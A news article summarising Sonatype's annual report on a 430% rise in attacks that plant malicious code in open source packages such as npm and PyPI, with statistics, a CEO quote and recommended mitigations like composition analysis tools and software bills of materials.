Security experts are warning of a 430% year-on-year increase in attacks targeting open source components directly in order to covertly infect key software supply chains.
There were 929 attacks recorded between July 2019 and May 2020, according to Sonatype’s annual State of the Software Supply Chain report. The study was compiled from analysis of 24,000 open source projects and 15,000 development organizations alongside interviews with 5600 software developers.
The targeting of open source components by malicious actors is concerning because of their popularity among DevOps teams to accelerate time-to-market.
According to the report, 1.5 trillion component download requests are projected in 2020 across all major open source ecosystems.
Node.js (npm) and Python (PyPI) repositories are thought to be among the most commonly targeted by attackers, as malicious code can be easily triggered during package installation.
This type of software supply chain attack is possible because in the open source world it is harder to discriminate between good and bad actors, and due to the inter-connected nature of projects, Sonatype claimed.
On the latter point, open source projects may have hundreds or thousands of dependencies on other projects that may contain known vulnerabilities which can be exploited.
In 2019, over 10% of global Java OSS downloads had at least one open source vulnerability, with new flaws being exploited in the wild within three days of public disclosure, the report claimed.
Today, 90% of components in an application are open source and 11% of those are known to contain vulnerabilities.
Sonatype CEO, Wayne Jackson, drew a distinction between “next-gen” upstream attacks and “legacy” software supply chain attacks, in which attackers go after vulnerabilities in products as soon as they are disclosed before organizations have time to remediate.
“Our research shows that commercial engineering teams are getting faster in their ability to respond to new zero day vulnerabilities,” he said.
“Therefore, it should come as no surprise that next generation supply chain attacks have increased 430% as adversaries are shifting their activities ‘upstream’ where they can infect a single open source component that has the potential to be distributed ‘downstream” where it can be strategically and covertly exploited.”
Development teams able to mitigate these risks are more likely to use automated software composition analysis (SCA) tools across the dev lifecycle, and centrally maintain a software bill of materials (SBOMs) for applications, the report claimed.